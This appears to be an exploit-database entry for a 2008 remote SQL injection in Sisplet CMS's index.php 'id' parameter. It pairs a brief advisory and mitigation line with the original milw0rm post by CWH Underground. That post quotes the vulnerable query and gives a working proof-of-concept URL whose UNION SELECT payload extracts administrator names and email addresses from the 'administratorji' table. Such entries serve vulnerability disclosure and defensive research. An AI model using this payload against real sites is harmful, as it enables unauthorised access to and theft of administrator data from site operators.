Sisplet CMS (index.php id) Remote SQL Injection Vulnerability

vendor:

Sisplet CMS

by:

CWH Underground

7.5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: Sisplet CMS

Affected Version From: 1/24/2008

Affected Version To: 1/24/2008

Patch Exists: NO

Related CWE: N/A

CPE: a:sisplet:sisplet_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Sisplet CMS (index.php id) Remote SQL Injection Vulnerability

A vulnerability exists in Sisplet CMS 2008-01-24 due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'index.php' script. An attacker can exploit this vulnerability to inject and execute arbitrary SQL commands in the application's back-end database, allowing for the manipulation or disclosure of arbitrary data.

Mitigation:

Ensure that user-supplied input is properly sanitized before being used in SQL queries.

Source

Exploit-DB raw data:

=================================================================
  Sisplet CMS (index.php id) Remote SQL Injection Vulnerability
=================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 1 July 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : Sisplet CMS
 VERSION     : 2008-01-24
 VENDOR      : http://cms.sisplet.org/
 DOWNLOAD    : http://downloads.sourceforge.net/sisplet/SiSplet-2008-01-24.zip
#####################################################

--- Remote SQL Injection ---

** Magic Quote must turn off **

-----------------------------------
 Vulnerable File (function.php)
-----------------------------------

$sql = mysql_query("SELECT parent FROM menu WHERE id = '$id'");


---------
 Exploit
---------

[+] http://[Target]/[sisplet_path]/index.php?fl=0&p1=1&p2=15&id=[SQL Injection]


------
 POC
------

[+] http://[Target]/[sisplet_path]/index.php?fl=0&p1=1&p2=15&id=15'/**/AND/**/1=2/**/UNION/**/SELECT/**/concat(ime,0x3a,priimek,0x3a,email),2,3,4/**/FROM/**/administratorji/**/WHERE/**/tip='0


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-07-01]